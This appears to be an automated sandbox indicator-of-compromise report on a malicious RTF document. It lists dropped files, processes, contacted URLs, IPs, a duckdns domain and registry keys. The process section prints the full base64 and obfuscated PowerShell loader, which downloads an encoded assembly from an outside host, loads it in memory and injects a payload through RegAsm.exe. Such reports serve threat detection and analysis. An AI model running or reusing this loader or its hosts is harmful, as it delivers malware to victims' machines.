IOC Report
beNwFiUxpf.rtf

loading gif

Files

File Path
Type
Category
Malicious
beNwFiUxpf.rtf
Rich Text Format data, version 1
initial sample
malicious
C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Unknown
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Unknown
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetbuddygirltodaysherewith[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{926167A6-CAB0-4B32-88C0-0581F3F115B7}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CC51DCBC-B941-4D7A-BFB9-1824D3A59C29}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D29994ED-3750-497F-B36D-C55979BFBFEF}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\1gp2aezt.hvc.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\eecm3taj.i0c.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\kq2amxgd.dzu.ps1
Unknown
dropped
C:\Users\user\AppData\Local\Temp\rbt3jf0p.iwc.psm1
Unknown
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\beNwFiUxpf.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Mon Oct 7 19:41:00 2024, length=101678, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$NwFiUxpf.rtf
data
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious

URLs

Name
IP
Malicious
http://107.175.242.80/430/KNOCC.txt
107.175.242.80
malicious
http://107.175.242.80/430/sweetbuddygirltodaysherewith.tIF
107.175.242.80
malicious
2024remcmon.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
http://go.microsoft.cv
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtxwp;Aonbase64Content
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://107.175.242.80/430/sweetbuddygirltodaysherewith.tIFj
unknown
http://go.micros
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
http://107.175.242.80
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://ia600100.us.archive.org
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://schemas.dmtf.or
unknown
There are 17 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
2024remcmon.duckdns.org
192.210.214.9
malicious
ia600100.us.archive.org
207.241.227.240
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
107.175.242.80
unknown
United States
malicious
192.210.214.9
2024remcmon.duckdns.org
United States
malicious
178.237.33.50
geoplugin.net
Netherlands
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Rmc-R2I0JW
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-R2I0JW
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-R2I0JW
time
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
k=/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2?/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
) /
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\287A6
287A6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
